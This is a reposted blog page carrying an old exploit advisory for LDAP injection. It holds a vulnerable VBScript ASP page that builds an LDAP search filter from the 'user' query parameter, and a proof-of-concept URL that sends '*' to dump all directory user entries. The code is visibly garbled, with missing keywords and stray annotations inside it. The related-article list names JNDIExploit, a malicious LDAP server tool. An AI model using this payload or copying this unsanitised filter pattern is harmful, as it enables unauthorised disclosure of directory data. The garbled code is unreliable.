LDAP injection proof of concept exploit.

最新推荐文章于 2024-07-02 22:39:08 发布
最新推荐文章于 2024-07-02 22:39:08 发布
阅读量842 收藏
点赞数
文章标签: vbscript user server filter character query 
[+] Vurnerebility:	LDAP Injection 
[+] Category	 :	Implemented Web exploit	 	
[+] Category	 :	Attack Technique
[+] Author 	 :	mc2_s3lector 
[+] dork   	 :	X/o/"	
[+] Contact	 : 	www.yogyacarderlink.web.id
[+] date	 :	4-2-10
[+] biGthank to	 :	Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding,

---------------------------------------------------------------------------------------------------------------------------------------------------
Directory acces protokol/directory manipulation,protokol breaker->standar protocol,query
custom statement,page request,componen execute command,data base server,web apps services
modify,remove etc.
---------------------------------------------------------------------------------------------------------------------------------------------------

code:
<html>
<head>
<body>
<%@ Language=VBScript %>
<%
Dim userName
Dim filter
Dim ldapObj
Const LDAP_SERVER = "ldap.example"
userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY)

( userName = "" ) then
Response.Write("<b>Invalid
request. Please specify a
valid user name</b><br>")
Response.End()
end if

filter= "(uid=" + CStr(userName) + //((*1))
userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3))
")" ' searching
for the user entry
'Creat LDAP object and setting
the base dn
Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
ldapObj.ServerName = LDAP_SERVER
ldapObj.DN =
"ou=people,dc=spilab,dc=com"
'Setting the search filter
ldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this line
ldapObj.Search
'Showing the user ennumeratin info
While ldapObj.result = ((1*.4 to *.5))
Response.Write("<p>")
Write("<b><u>User
information for : " +
ldapObj.AttrValue(0) + "</u></b><br>")
For i = 0 To ldapObj.AttrCount -1
Response.Write("<b>" +
ldapObj.AttrType(i) +
"</b> : " + ldapObj.AttrValue(i) + "<br>" )
Response.Write("</p>")
Wend ((*.5))
%>
</head>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5))

POC:

http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with
(uid=*). The resulting LDAP statement will make the server return
-------------------------------------------------------------------------------------------------------------------------------------------------
cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bWAPP-LDAP Injection
hee_mee的博客
09-14 1319
zeronil
LDAP injection
zhigangsun的专栏
04-20 1751
LDAP injection
LDAP Injection (Lightweight Directory Access Protocol Injection
kezhen的专栏
03-23 2233
http://projects.webappsec.org/w/page/13246947/LDAP%20Injection LDAP Injection LDAP Injection is an attack technique used to exploit web sites that construct LDAP statements from user-supplied in
LDAP注入与防御解析
weixin_30877181的博客
02-27 386
  [目录]   0x1 LDAP介绍   0x2 LDAP注入攻击及防御   0x3 参考资料   0x1 LDAP介绍   1 LDAP出现的背景   LDAP(Lightweight Directory Access Protocol):轻量级目录访问协议,是一种在线目录访问协议。LDAP主要用于目录中资源的搜索和查询,是X.500的一种简便的实现。        ...
LDAP注入与防御剖析
热门推荐
小太阳~
02-22 2万+
0x00 前言前些日子笔者在看OWASP测试指南时看到了对LDAP注入攻击的介绍,对此产生了兴趣,可是上面谈论的东西太少,在网上经过一番搜索之后找到了构成本文主要来源的资料,整理出来分享给大家。本文主要分为两部分,第一部分为对LDAP的介绍,包括LDAP的应用背景和它的一些特性。第二部分也是本文的重点,讲解LDAP的注入攻防,读者朋友可以看到虽说是攻防,但实际侧重注入攻击层面。第一部分主要整理自I
ldapadmin-4.17.20304.0-x64-eng.msi
06-10
Softerra LDAP Administrator 2019.1 最新版本,功能齐全,稳定
ldap-connector-4.2.2.jar
08-06
Java 连接ldap需要驱动包,否则JDBC无法访问数据库(无法注册驱动),常用的是ldap-connector
ldapadmin-4.19.21906.0-x64-eng.msi
09-18
1. LDAP客户端工具 2. 可以用于LDAP的管理 3. 功能包括添加条目、查询等等 4. 经典的LDAP Browser的升级版本
ldap3-2.7.tar.gz
05-29
ldap3 is a strictly RFC 4510 conforming LDAP V3 pure Python client library. The same codebase runs in Python 2, Python 3, PyPy and PyPy3.
LDAP操作说明和流程文件.rar
04-06
- **配置文件**: openLDAP的核心配置文件通常是`slapd.conf`或`ldap.conf`,需要根据需求进行修改。 - ** slapd**: 作为openLDAP服务器的主要守护进程,需要配置监听端口、日志记录、数据存储位置等。 - **模块...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
Java高风险漏洞与修复之——LDAP injection(LDAP注入)
最新发布
oscar999的专栏
07-02 122
LDAP注入是一种攻击技术,它可以利用应用程序中的安全漏洞对LDAP(轻量级目录访问协议)服务进行恶意查询或修改操作。当应用程序未能适当地清理用户的输入内容,将其嵌入到LDAP查询中时,就可能发生LDAP注入。攻击者通过注入未经授权的指令或条件来操纵查询结果,可能导致敏感数据的泄露、未授权的数据修改或者删除。与SQL注入类似,LDAP注入可以使攻击者修改LDAP查询的逻辑,对LDAP树目录进行不合法的搜索和修改。例如,攻击者可以修改一个查询,绕过登录验证,或者获取无权访问的用户信息。
Ldap 漏洞
01-12 595
0x00 Ldap安装 官网地址:https://www.userbooster.de/en/download/openldap-for-windows.aspx 在win2008上安装,一路Next即可 转载于:https://www.cnblogs.com/xiaozi/p/8276962.html...
CVE-2019-0708 PoC with EXP ( Proof of Concept with Exploits )
weixin_34080951的博客
05-15 1001
CVE-2019-0708 漏洞利用验证工具脚本CVE-2019-0708 POC | CVE-2019-0708 EXP | CVE-2019-0708 poc | CVE-2019-0708 exp | CVE-2019-0708 exp download | CVE-2019-0708 poc download | CVE-2019-0708 exp 哪里下载 | CVE-2019-07...
LDAPLDAP注入
weixin_45682070的博客
06-22 634
LDAP简介 LDAP(Light Directory Access Portocol),它是基于X.500标准的轻量级目录访问协议。 目录是一个为查询、浏览和搜索而优化的数据库,它成树状结构组织数据,类似文件目录一样。 LDAP专注于优化查询,又很少有事务处理, 就像一个缓存一样 LDAP,轻量目录访问协议 Light Directory Access Portocol dn:一条记录的位置 dc:一条记录所属的区域 ou:一条记录所属的组织 cn/uid:一条记录的名字/ID dn Disti
LDAP注入漏洞
seanyang_的博客
10-24 919
LDAP注入是指客户端发送查询请求时,输入的字符串中含有一些特殊字符,导致修改了LDAP本来的查询结构,从而使得可以访问更多的未授权数据的一种攻击方式。为了防止攻击者侵犯程序员的各种预设情况,应使用白名单的方法,确保LDAP查询中由用户控制的数值完全来自于预定的字符集合,应不包含任何LDAP元字符。使用最简单的注入方式,令传入参数的值为“*”,则构造的动态查询条件为 "(cn=*)”,这样可以查询到所有员工的信息,导致信息泄露。进行编码,编码后的值为字符对应的。
LDAP注入学习小记
0nc3的博客
08-16 2724
0x00 前言 从公司的漏洞手册了解到LDAP注入,于是有了这篇学习博客 0x01 LDAP概述 1.什么是LDAP LDAP(Lightweight Directory Access Protocol):轻量级目录访问协议,是一种在线目录访问协议。LDAP主要用于目录中资源的搜索和查询,是X.500的一种简便的实现。 简单来说,可以理解为LDAP是某种搜索协议,就像我们熟知的数据库一样,我们利用...
命令注入(Command Injection)安全漏洞(SQL注入、LDAP注入、OS命令注入、XPath注入、JavaScript注入)
Dontla的博客
07-12 884
这些命令注入漏洞都是由于应用程序没有正确地验证和过滤用户输入导致的。为了防止这些漏洞,应该始终对用户输入进行验证、过滤和转义,使用参数化查询或预编译语句,以及遵循最小权限原则。此外,定期进行安全审计和漏洞扫描,及时修复发现的漏洞也是非常重要的。
摘录"理解LDAPLDAP注入"
zhangge3663的博客
03-27 885
0x01 LDAP简介        LDAP,轻量目录访问协议           | dn: 一条记录的位置           | dc: 一条记录所属区域           | ou: 一条记录所属组织           | cn/uid:一条记录的名字/ID        这里拿LDAP和数据库进行比较。数据库用"表"来存数据,LDAP用"树"来村数据。数据库主要是三个DB,TABL...
jndi:ldap://1700619429387jtyyp./ mjAy
11-23
根据提供的引用内容,jndi:ldap://1700619429387jtyyp./ mjAy 是一个JNDI(Java Naming and Directory Interface)的URL。JNDI是Java平台提供的一种标准API,用于访问命名和目录服务。它允许Java应用程序通过统一的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值